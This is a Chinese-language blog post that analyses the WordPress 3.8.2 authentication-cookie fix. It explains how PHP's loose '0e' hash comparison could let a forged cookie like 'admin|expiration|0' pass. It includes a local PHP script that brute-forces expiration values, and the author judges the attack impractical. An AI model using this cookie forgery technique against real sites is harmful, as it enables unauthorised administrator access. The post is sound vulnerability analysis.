WordPress 3.8.2 cookie伪造漏洞再分析


Jul 28 2014

WordPress 3.8.2 cookie伪造漏洞再分析

首页 » 代码审计 » WordPress 3.8.2 cookie伪造漏洞再分析   

作者:donwa

0x00 背景


看了WordPress 3.8.2补丁分析 HMAC timing attack,眼界大开,原来还可以利用时间差来判断HMAC。

但我总觉得这个漏洞并不是简单的修复这个问题。

查看了官方提供的资料:“该漏洞是由WordPress的安全团队成员Jon Cave发现。”。

也许漏洞还有这样利用的可能。

0x01 PHP的特性


当PHP在进行 ”==”,”!=”等非严格匹配的情况下,会按照值的实际情况,进行强制转换。

1
2
3
4
5
6
<?php
var_dump(0 =='0');// true
var_dump(0 =='abcdefg');// true  
var_dump(0 ==='abcdefg');// false
var_dump(1 =='1abcdef');// true  
?>

当有一个对比参数是整数的时候,会把另外一个参数强制转换为整数。

0x02 分析修复的代码


官方版的diff只在php里改动了一个位置:

1
2
3
4
<?php
-  if ( $hmac != $hash ) {  
+  if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {
?>

其中$hmac来源于cookies。是我们可控的一个输入参数。

1
2
3
4
5
6
<?php
Admin|1397564163|1f253e501c301bf5bf293c40d7d92ded
//$username = ‘Admin’;
//$expiration = 1397564163;
//$hmac = ‘1f253e501c301bf5bf293c40d7d92ded’;
?>

$hash是以下代码生成一个md5值。

1
2
3
4
<?php
$key= wp_hash($username.$pass_frag.'|'.$expiration,$scheme);
$hash= hash_hmac('md5',$username.'|'.$expiration,$key);
?>

当$hmac == $hash时,登录成功。

那么,有几种情况会登录成功。

1
2
3
4
5
6
7
8
9
10
11
<?php
//第一种情况,完全相等。
$hmac= ‘1f253e501c301bf5bf293c40d7d92ded’;
$hash= ‘1f253e501c301bf5bf293c40d7d92ded’;
//第二种情况.第一位为数字,第二位为字母
$hmac= 1;
$hash= ‘1f253e501c301bf5bf293c40d7d92ded’;
//第三种情况。第一位为字母
$hmac= 0;
$hash= ‘af253e501c301bf5bf293c40d7d92ded’;
?>

很明显,第三种出现的情况非常大。

那么我们有没有可能把$hmac构造成一个整数0呢?

0x03 漏洞利用


我们看看cookie解析的代码:

1
2
3
4
5
6
<?php
    $cookie_elements=explode('|',$cookie);
    if(count($cookie_elements) != 3 )
        returnfalse;
    list($username,$expiration,$hmac) =$cookie_elements;
?>

当我们把cookie设置为:

Admin|1397564163|1

时。$hmac=’1’。但是,$hmac是字符串1,而不是整数1。

1
2
3
<?php
var_dump($hmac);//string(“1”);
?>

非常遗憾,这个漏洞是不能利用的。

难道官方修复的真的不是这个漏洞

0x04 柳暗花明又一村


还有什么情况能让字符串识别成整数吗?是的,还有!

1
2
3
<?php
var_dump("0"=="0e1234567890123456...32");// true
?>

‘e’会识别为次方,0的N次方为0;

所以,这个漏洞的利用方式还可以是:
让$hmac = ‘0’;

通过改变$expiration来改变$hash。获得一个,第一位为0,第二位为e,后面所有位为数字的$hash.

1
2
3
4
5
<?php
$hmac= ‘0’;
$hash= ‘0e1234567890123456...32’;
var_dump($hmac==$hash);  // true
?>

0x05 攻击代码


本地测试代码(实际攻击代码应该是构造cookies远程请求):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
    include('wp-load.php');
 
    $user= get_userdata(1);
    $username=$user->user_login;
    $pass_frag=substr($user->user_pass, 8, 4);
 
    $expiration= 9999999999;//设置一个很大的过期时间,然后递减
 
    while($expiration>0){
        $key= wp_hash($username.$pass_frag.'|'.$expiration,'auth');
        $hash= hash_hmac('md5',$username.'|'.$expiration,$key);
        if('0'==$hashOR'1'==$hash){
            echo$expiration.'@'.$hash;
            file_put_contents('done.txt',$expiration.'@'.$hash);
            exit();
        }
        $expiration-= 1;//过期时间-1
        echo$expiration.'@'.$hash."\r\n";
    }
?>

通过改变过期时间,尝试碰撞到可以利用的hash。

按照理论值。碰撞到可以利用的$expiration几率是(2110^30)/(16^32)。也就是5.8774717541114 * 10 -9。

理论上:把cookies设置成 “admin|碰撞到的过期时间|0”,就可以登陆后台了。

但是几率太小,还不如穷举密码了。

Ps:我本地跑了几个小时了,还没遇到一个。


如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: cookie伪造漏洞

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «使用LDAP查询快速提升域权限 | Hacking with Unicode»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~